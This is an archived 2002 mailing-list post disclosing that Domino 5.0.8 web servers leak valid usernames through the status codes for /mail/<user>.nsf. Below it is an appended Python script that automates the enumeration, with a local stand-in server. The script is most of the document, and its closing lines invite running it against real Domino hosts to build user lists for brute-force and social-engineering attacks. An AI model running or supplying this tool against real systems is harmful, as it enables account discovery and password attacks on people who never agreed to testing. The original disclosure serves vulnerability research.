Vulnerability Development mailing list archives

Enumerating users on a Domino webserver


From: nicob () nicob net
Date: Wed, 30 Jan 2002 17:54:41 +0100

Hi,

during a pen-test against a Domino 5.0.8 webserver, I was able to enumerate valid users.

A simple "GET /mail/toto.nsf HTTP/1.0" redirects to the login page (with a "200 OK"
HTTP code) if the user "toto" exists, and a "404 File not Found" is returned if the user
doesn't exist.
This issue can allow a faster brute force attack on HTTP passwords.


I have searched the Net for more information about this problem, but I found nothing.

Can the readers reproduce this behaviour?
Do you see other implications than user enumeration (for social engineering and brute
force attacks)?


Nicob
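The probe described in the post, written up as an added example (this is not code from the original message or from Nicob). It applies only the rule the post states: a 200 on GET /mail/<user>.nsf means the mail file (and so the user) exists, a 404 means it does not; anything else is reported as "unknown" rather than guessed. Python's http.client is used instead of a raw HTTP/1.0 request line, and the Domino server is replaced by a constructed local stand-in that only models the status-code behaviour, so the script runs offline. The user names and port are assumptions.

```python
"""Enumerate users on a Domino web server via /mail/<user>.nsf status codes.

Added example, not from the original post. Verdict rule follows the post:
200 (login page served) => mail file exists, 404 => it does not.
The FakeDomino server below is a constructed stand-in for an offline run.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def classify(status):
    """Map the HTTP status of GET /mail/<user>.nsf to a verdict."""
    if status == 200:
        return "exists"
    if status == 404:
        return "absent"
    return "unknown"  # e.g. 401/403/500: review by hand, do not guess


def probe_user(host, port, username, timeout=5):
    """Issue GET /mail/<username>.nsf and return (status, verdict)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/mail/%s.nsf" % username)
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return resp.status, classify(resp.status)
    finally:
        conn.close()


def enumerate_users(host, port, candidates):
    """Return, in input order, the candidates whose mail file answers 200."""
    return [u for u in candidates if probe_user(host, port, u)[1] == "exists"]


# --- Constructed stand-in for the Domino 5.0.8 behaviour (assumption: only
# the 200-vs-404 rule from the post is modelled; user names are made up) ---
KNOWN_USERS = {"toto", "alice"}


class FakeDomino(BaseHTTPRequestHandler):
    def do_GET(self):
        path = self.path
        if path.startswith("/mail/") and path.endswith(".nsf"):
            user = path[len("/mail/"):-len(".nsf")]
            if user in KNOWN_USERS:
                body = b"<html>login form</html>"  # stands in for the login page
                self.send_response(200)
                self.send_header("Content-Length", str(len(body)))
                self.end_headers()
                self.wfile.write(body)
                return
        self.send_response(404)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the console quiet
        pass


def start_fake_server():
    """Start the stand-in on a free localhost port; return (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeDomino)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def demo(candidates=("toto", "bob", "alice")):
    """Run the enumeration against the stand-in and return the hits."""
    srv, port = start_fake_server()
    try:
        return enumerate_users("127.0.0.1", port, candidates)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

Against a real target, point enumerate_users at the Domino host and port and feed it a candidate list; the "unknown" verdict is there so that servers returning 401 or 403 for every path, which the post does not describe, are not silently miscounted as hits.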
